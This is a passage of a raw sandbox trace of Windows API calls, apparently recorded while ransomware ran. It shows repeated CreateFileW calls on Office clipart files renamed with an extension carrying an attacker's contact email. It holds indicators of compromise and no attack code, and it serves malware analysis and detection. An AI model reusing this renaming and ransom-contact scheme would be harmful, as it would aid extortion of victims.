dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.007] CloseHandle (hObject=0x528) returned 1 [0166.008] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.008] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.008] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292272.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292272.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.008] CloseHandle (hObject=0x528) returned 1 [0166.009] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.009] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.009] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292278.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292278.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.009] CloseHandle (hObject=0x528) returned 1 [0166.011] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.011] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.011] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292286.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292286.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.011] CloseHandle (hObject=0x528) returned 1 [0166.012] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.012] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.012] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0293800.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0293800.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.012] CloseHandle (hObject=0x528) returned 1 [0166.013] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.013] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.014] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0293832.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0293832.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.014] CloseHandle (hObject=0x528) returned 1 [0166.015] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.015] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.015] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0294989.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0294989.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.016] CloseHandle (hObject=0x528) returned 1 [0166.016] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.016] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.016] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0294991.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0294991.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.017] CloseHandle (hObject=0x528) returned 1 [0166.269] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.269] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.269] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0295069.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0295069.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.269] CloseHandle (hObject=0x484) returned 1 [0166.271] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.271] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.271] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309902.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309902.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.271] CloseHandle (hObject=0x484) returned 1 [0166.272] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.273] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.273] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309904.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309904.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.273] CloseHandle (hObject=0x484) returned 1 [0166.274] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.274] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.274] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309920.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309920.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.274] CloseHandle (hObject=0x484) returned 1 [0166.276] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.276] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.276] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313896.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0313896.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.276] CloseHandle (hObject=0x484) returned 1 [0166.278] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.278] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.278] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313965.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0313965.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.278] CloseHandle (hObject=0x484) returned 1 [0166.281] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.281] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.281] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313970.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0313970.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.281] CloseHandle (hObject=0x484) returned 1 [0166.283] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.283] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.283] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0313974.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0313974.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.283] CloseHandle (hObject=0x484) returned 1 [0166.284] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.284] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.284] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0314068.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0314068.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.284] CloseHandle (hObject=0x484) returned 1 [0166.286] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.286] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.286] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0315580.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0315580.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.286] CloseHandle (hObject=0x484) returned 1 [0166.296] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.296] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.296] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0315612.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0315612.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.297] CloseHandle (hObject=0x484) returned 1 [0166.297] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.297] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.298] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318448.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0318448.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.298] CloseHandle (hObject=0x484) returned 1 [0166.300] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.300] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.300] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318804.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0318804.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.300] CloseHandle (hObject=0x484) returned 1 [0166.301] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.301] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.302] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0318810.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0318810.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.302] CloseHandle (hObject=0x484) returned 1 [0166.303] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.303] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.303] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0321179.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0321179.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.303] CloseHandle (hObject=0x484) returned 1 [0166.304] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.304] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.304] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0324694.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0324694.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.304] CloseHandle (hObject=0x484) returned 1 [0166.305] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.305] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.305] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0324704.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0324704.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.305] CloseHandle (hObject=0x484) returned 1 [0166.306] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.306] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.307] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0337280.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0337280.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.307] CloseHandle (hObject=0x484) returned 1 [0166.308] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.308] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.308] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341328.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341328.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.308] CloseHandle (hObject=0x484) returned 1 [0166.309] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.309] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.309] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341344.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341344.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.309] CloseHandle (hObject=0x484) returned 1 [0166.310] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.310] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.310] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341439.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341439.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.310] CloseHandle (hObject=0x484) returned 1 [0166.760] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.760] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.760] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341447.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341447.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.761] CloseHandle (hObject=0x51c) returned 1 [0166.761] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.761] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.761] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382939.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382939.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.762] CloseHandle (hObject=0x51c) returned 1 [0166.763] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.763] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.763] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382942.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382942.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.763] CloseHandle (hObject=0x51c) returned 1 [0166.765] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.765] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.765] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382944.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382944.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.765] CloseHandle (hObject=0x51c) returned 1 [0166.766] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.766] SetFilePointerEx 